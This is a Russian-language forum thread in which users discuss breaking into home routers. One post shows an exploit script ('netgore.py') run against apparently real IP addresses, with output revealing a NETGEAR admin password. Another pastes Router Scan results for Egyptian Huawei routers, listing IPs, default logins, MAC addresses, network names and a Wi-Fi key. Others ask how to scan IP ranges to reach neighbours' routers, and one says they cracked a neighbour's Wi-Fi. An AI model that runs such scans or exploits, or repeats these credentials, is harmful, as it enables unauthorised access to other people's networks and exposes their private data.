Нет, причина в другом (моих предсказываний)... Просто эксплоиты для роутеров не пользуются спросом, как например на винду, из-за этого кому-то покупать его нету смысла..
Не знаю, надо посмотреть повнимательнее. На том, что я пробовал - нет. Code: # python netgore.py 73.237.21.160 844З Attcking: NETGEAR AC1450 token found: 1160125963 user: admin pass: cl0s3out Здесь не срабатывает: Code: # python netgore.py 73.72.235.214 844З Attcking: NETGEAR AC1450 token found: 0 not vulnerable becuse password recovery IS set
ребятушки мои золотые. бяда пришла откуда не ждали. из Египта. а точнее из тевой хучи роутеров Huawei EchoLife HG532n и Huawei EchoLife HG531 V1 произведёных Китае и установленных в Египте. подробнее далее в выпуске: при сканировании весма удачно подбирается пароль и логин на админку, но пароль на точку не получается. пишет "<not accessible>" спасайте ) 41.32.34.129 80 156 Done user:user Huawei EchoLife HG532n 88:E3:AB:E5:BF:90 MaKaNe WPA <not accessible> 34259283 41.32.34.193 80 156 Done admin:admin Huawei EchoLife HG531 V1 F4:E3:FB3:71:60 Arex WPA2 <not accessible> 38571169
41.32.34.193 80 125 Done admin:admin Huawei EchoLife HG531 V1 F4:E3:FB3:71:53 Arex WPA2 Psd.Arex 38571169
Привет всем. Указываю диапазон: 62.183.0.0-62.183.127.255 А он автоматом пишет: 62.183.0.0/17 Почему так и как быть? Он не находит вайфай точки, которые видны с моего бука или смарта. WTF?
Это норма (CIDR, вроде). Spoiler: В гугле что-то нашёл Беcклассовая адресация (Classless InterDomain Routing, англ. CIDR) - метод IP-адресации, позволяющий гибко управлять пространством IP-адресов, не используя жёсткие рамки классовой адресации. Использование этого метода позволяет экономно использовать конечный ресурс IP-адресов. На работу это не должно влиять,а размер диапазонов уменьшает (переводит их в краткую форму) А вот тут подробнее... Точно все те роутеры сидят на том диапазоне и они не за натом? Может пароли не дефолтные, а прошивки без уязвимостей, которые в базе роутер скана? Или ты что-то другое подумал о работе софта ТК сравнить результат работы роутер скана и что нашёл мак бук немного странно
Рассказываю: живу в 5ти этаже, по подъезду на каждом этаже стоят коробки ростелекома, от них идёт кабель в квартиру. Я так думаю что провайдер 100% тот же что и у меня, и ip думаю с тем же диапазоном. Но судя по скану роутерскана, видимо все же ИП в другом диапазоне, а там хз. Мак адрес роутера я вижу а вот ИП нет.
Единственно могут быть на разных регионах я роутер соседа выцепил аж на Мурманском диапазоне ростелекома и ещё одна плохая штука Ростелеком во многих регионах в настройках оборудования по умолчанию ставит закрытым внешний доступ
Рассказываю: живу на 8 этаже, около меня есть 1 точка (сигнал не очень, на черный день сойдет), так вот... Подобрал пароль, подключился, смотрю, а там ип как у меня (мой 12.23.11.95, а у него 12.23.11.83) ну и провайдер тоже как у меня... А вот запускаю роутер скан на этот ип (нахожусь в этом же диапазоне) - не находит там роутер. Походу совсем закрыт, даже от своих соседей
Подключитесь к этой точке, посмотрите какой адрес шлюза Вам дал DHCP, после пробуйте попасть на маршрутизатор по этому адресу и смотрите настройки, взможно там и найдёте ответ на свой вопрос.
Я за городом до весны... нормального интернета здесь нет, и терминалов оплаты тоже. Думал, что сисадмин или мой зам продлят домен, но видимо не стали.